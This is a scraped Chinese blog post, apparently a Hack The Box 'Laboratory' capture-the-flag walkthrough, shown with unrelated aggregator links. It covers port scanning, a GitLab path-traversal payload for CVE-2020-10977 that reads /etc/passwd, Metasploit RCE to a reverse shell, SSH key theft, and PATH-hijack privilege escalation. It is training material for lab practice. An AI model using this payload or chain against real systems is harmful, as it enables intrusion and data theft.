zoukankan      html  css  js  c++  java

  • HTB::Laboratory

    实验环境

    info

    渗透过程

    0x01 信息搜集

    masscan进行快速端口扫描:

    masscan -p1-65535 10.10.10.216 --rate=1000
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2021-04-17 08:10:08 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]
Discovered open port 80/tcp on 10.10.10.216
Discovered open port 22/tcp on 10.10.10.216
Discovered open port 443/tcp on 10.10.10.216

    开放22、80、443端口

    nmap 进行指定开放端口扫描:

    nmap -sC -sV -p$ports --min-rate=100 10.10.10.216
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-17 16:13 CST
Nmap scan report for laboratory.htb (10.10.10.216)
Host is up (0.57s latency).

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 25:ba:64:8f:79:9d:5d:95:97:2c:1b:b2:5e:9b:55:0d (RSA)
|   256 28:00:89:05:55:f9:a2:ea:3c:7d:70:ea:4d:ea:60:0f (ECDSA)
|_  256 77:20:ff:e9:46:c0:68:92:1a:0b:21:29:d1:53:aa:87 (ED25519)
80/tcp  open  http     Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to https://laboratory.htb/
443/tcp open  ssl/http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: The Laboratory
| ssl-cert: Subject: commonName=laboratory.htb
| Subject Alternative Name: DNS:git.laboratory.htb
| Not valid before: 2020-07-05T10:39:28
|_Not valid after:  2024-03-03T10:39:28
| tls-alpn:
|_  http/1.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.19 seconds

    443端口存在两个网站:https://laboratory.htbhttps://git.laboratory.htb

    whatweb:

    whatweb

    0x02 过程

    CVE-2020-10977

    默认首页为静态页面,首先使用@laboratory.htb注册gitlab并登录:

    gitlab

    得到gitlab版本,查找相关漏洞:

    gitlabrce

    Hackerone中有针对此漏洞的分析:

    Hackone

    利用步骤:

    ![a](/uploads/11111111111111111111111111111111/../../../../../../../../../../../../../../etc/passwd)

    随便建立一个新project test,在项目中创建issue,中填入以下payload:

    issue

    再新建另一个test1,将刚才的issue move到test1中,此时可以点击下载passwd文件:

    file

    获得passwd:

    passwd

    RCE:

    RCE

    使用MSF进行利用:

    msfinfo

    获得反弹shell:

    rshell

    user.txt

    登录进入后发现为git用户,尝试修改gitlab管理员用户密码:

    dexter

    成功登录,在后台发现用户私钥:

    id_rsa

    复制到本地通过SSH进行登录:

    user.txt

    root.txt

    发现todo文件,猜测可以利用docker进行提权:

    todo

    使用提权辅助工具:

    提权辅助

    发现docker-security存在是SUID执行程序,使用ltrace来跟踪进程调用库函数的情况 :

    ltrace

    做了2次chmod

    It’s using chmod without specify the full path /usr/bin/chmod

    So This is exploited by Path-Hijacking.

    If you don’t known about PATH-HIJACKING read this article.

    Linux Privilege Escalation Using PATH Variable

    因为没有使用完整路径/usr/bin/chmod,所以我们可以通过增加环境变量的方式劫持这个路径,进行提权:

    提权

    成功得到root.txt。

    Reference

    CVE-2020-10977

    路径劫持
  • 相关阅读:
    网曝!互联网公司那些老司机才懂的秘密~~
    中国IT行业薪资:与销售相比,程序员真得很“穷”
    太简单了,教你去掉Java代码中烦人的“!=null”
    怎么判断自己在不在一家好公司?
    内部泄露版!互联网大厂的薪资和职级一览
    重磅!GitHub突然宣布,对全球人免费开放全部核心功能
    痛心!Pandownload开发者被抓!我终于决定使用Docker搭建一个多端同步网盘!
    退税:我承认我有赌的成分
    golang实现的简单优先队列
    ERROR 2002 (HY000): Can't connect to local MySQL server through socket '/var/lib/mysql/mysql.sock' (13)解答
  • 原文地址:https://www.cnblogs.com/chalan630/p/14705167.html
Copyright © 2011-2022 走看看